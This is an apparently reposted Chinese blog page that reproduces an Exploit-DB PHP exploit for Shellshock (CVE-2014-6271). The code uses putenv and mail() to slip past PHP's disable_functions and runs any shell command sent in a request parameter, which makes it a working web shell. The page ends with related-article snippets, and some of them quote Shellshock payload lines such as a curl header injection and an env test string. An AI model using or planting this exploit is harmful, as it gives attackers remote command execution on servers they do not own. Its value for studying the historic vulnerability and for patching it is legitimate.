PHP 5.x Shellshock Exploit (bypass disable_functions)

最新推荐文章于 2022-04-10 11:39:01 发布
最新推荐文章于 2022-04-10 11:39:01 发布
阅读量855 收藏
点赞数
分类专栏: 编程 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<pre>
<?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?>
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
     $tmp = tempnam(".","data");
     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
     // In Safe Mode, the user may only alter environment variables whose names
     // begin with the prefixes supplied by this directive.
     // By default, users will only be able to set environment variables that
     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
     // PHP will let the user modify ANY environment variable!
     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>


转载自:http://www.exploit-db.com/exploits/35146/

eT48_Sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bash-3.2-33.el5_11.4.x86_64
10-09
"5x"可能指的是Linux内核的5.x版本,但在这里可能只是泛指较新的Linux系统。Bash在过去曾出现过著名的安全漏洞,例如2014年的“Shellshock”漏洞,它允许攻击者通过精心构造的环境变量值来执行任意代码,对系统造成...
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1377
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
详解ShellShock 漏洞复现原理,内附ShellShock的修复方法
Anprou的博客
05-31 6723
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
CTFHub Bypass disable_function系列(已完结)
feng的博客
10-14 3748
LD_PRELOAD 首先我们需要了解LD_PRELOAD这个环境变量,这里有两篇文章可以参考: 警惕UNIX下的LD_PRELOAD环境变量 利用环境变量LD_PRELOAD来绕过php%20disable_function 读完之后就会对LD_PRELOAD这个环境变量有所了解,知道了它是干什么的,但是对于如何利用还不太清楚。 利用这个环境变量的话,可以使用这些函数: putenv() error_log() mail() LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时
PHP Bypass disabled_functions 备忘录
weixin_43610673的博客
06-02 836
严格的 disable_functions 限制项.soiconv()GNU Bash 环境变量远程命令执行漏洞(CVE-2014-6271)$cmd$tmp利用pcntl_exec()这个pcntl插件专有的命令执行函数来执行系统命令expsendmail能够上传自己的.so文件能够控制环境变量的值(设置LD_PRELOAD变量为恶意动态链接库文件路径),比如putenv函数。
bypass disable_function
lonmar的博客
11-26 994
主要参考https://www.anquanke.com/post/id/208451 0x01 LD_PRELOAD LD_PRELOAD是什么 : 参考 警惕UNIX下的LD_PRELOAD环境变量 https://blog.csdn.net/haoel/article/details/1602108 绕过原理: https://blog.csdn.net/weixin_33738982/article/details/87979967 攻击思路: 1. 有上传权限,上传特定的PHP脚本,hack..
BestShell:世界上最好用的php大马
03-09
增加PHP执行命令的函数(proc_open,COM('Wscript.shell'),shellshock),可以在某些情况下绕过disable_function 2.0更新日志 去除后门 修复乱码问题 所有数据提交均采用base64方式,实测绕过waf udf提权自动...
shellshock_enum:通过 Shellshock 枚举系统信息
07-01
shellshock_enum 这是一个通过 Shellshock 枚举系统信息的 metasploit 模块。 在 $MSF/modules/auxiliary/scanner/http 中安装 ruby​​ 脚本 用法: msf > use auxiliary/scanner/http/shellshock_enum msf ...
bash补丁包.zip
10-14
5、rhel5.x_32 bash-3.2-33.el5.1.i386.rpm bash-3.2-33.el5_10.4.i386.rpm 6、rhel5.x_64 bash-3.2-33.el5_10.4.x86_64.rpm bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm 7、rhel6.x_64 bash-4.1.2-15.el6_5.2.x86_...
Bash漏洞——Shellshock浅析.pdf
07-10
Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞的存在使得攻击者能够通过环境变量...
PHP通过bypass disable functions执行系统命令的方法汇总
10-18
主要介绍了PHP通过bypass disable functions执行系统命令的方法汇总,需要的朋友可以参考下
Bypass disable_function
CN天狼
04-10 2713
Bypass disable_function
Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
热门推荐
Exploit的小站~
05-10 3万+
Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。 其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。 程序中的代理是我本地的goagent代理,端口是8087。如何...
【漏洞分析】CVE-2014-6271 Shellshock漏洞 bypass disable_functions
4ut15m's blog
03-07 567
序 我是真懒. 漏洞信息 小于4.3版本的bash会将以"(){"开头的环境变量解析为函数,解析后bash不会退出,会继续执行.故而可构造payload达到命令执行. 本地利用 payload: 环境变量='() { :; };cmd;' 另起一进程. ...
PHP中通过bypass disable functions执行系统命令的几种方式
weixin_33734785的博客
05-04 289
原文:http://www.freebuf.com/articles/web/169156.html 一、为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件中,就是我们所说的disable functions了,特别是虚拟主机运营商,为了彻底隔离同服务器的客户...
环境变量相关的shellshock攻击
qq_43674956的博客
01-12 578
环境变量 什么是环境变量 环境变量是存储在进程中的一系列动态键值对,它们可以影响进程的行为。 可以通过局部变量envp获取,只能在main函数中使用 也可以用environ全局变量获取 也可以调用getenv(var_name)来获取 这个函数是在environ数组中搜索 也可以使用putenv(),setenv()和unsetenv()来改变修改和删除环境变量 进程获取环境变量的方式 使用fork()子进程继承父进程的所有环境变量 使用execve()第一个参数是新程序的路径 第二个参数是数组传入新程序的
shellshock漏洞利用
我的学习笔记
02-28 1167
echo $shell #查看当前用户的shell env x='() { :;}; echo vulnerable' bash -c "echo this is a test" #定义了一个名字叫x的变量,内容时单引号内的。 exploit:curl -H 'x: () { :;};a='/bin/mkdir /var/www/.ssh';echo ...
php 5.2.17p1 disable_function bypass 求指点
qq_28247467的博客
03-30 1233
也许这点乌云币少了点,可是再多我就掉到路人了。期望有人来指点一下。 小菜碰到了一个硬茬,摸索了好长时间,终究不得破解,心中很是抑郁。。。我倒是也没什么目的,可是问题不解决就心里不舒畅。 目标情况: 是linux的系统,我的目的就是想能执行命令,获得command line shell ,能不能获取root是其次,就是气不过试过好多方法都不能绕过去执行命令。 php.
ctf web方向与php学习记录30之shellshock初见()
这周末在做梦的博客
12-03 698
本次分享的内容有关shellshock。一,知识学习1 unix shell、bash、POSIX、API的学习笔记2 shellshock及相关漏洞总结一,历史二,介绍三,相关漏洞二,例题ctfhub shellshock wp 一,知识学习 1 unix shell、bash、POSIX、API的学习笔记 2 shellshock及相关漏洞总结 一,历史 一个名为Shellshock的安全漏洞在2014年9月初被发现,并迅速导致互联网上的一系列攻击。这个漏洞可追溯到1989年发布的1.03版本。 二,
蚁剑绕过disable_functions
最新发布
12-17
根据提供的引用内容,AntSword虚拟终端中已经集成了对ShellShock的利用,可以绕过disable_functions。具体步骤如下: 1.打开AntSword虚拟终端,输入以下命令,检查是否存在ShellShock漏洞: ```bash env x='() { :...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值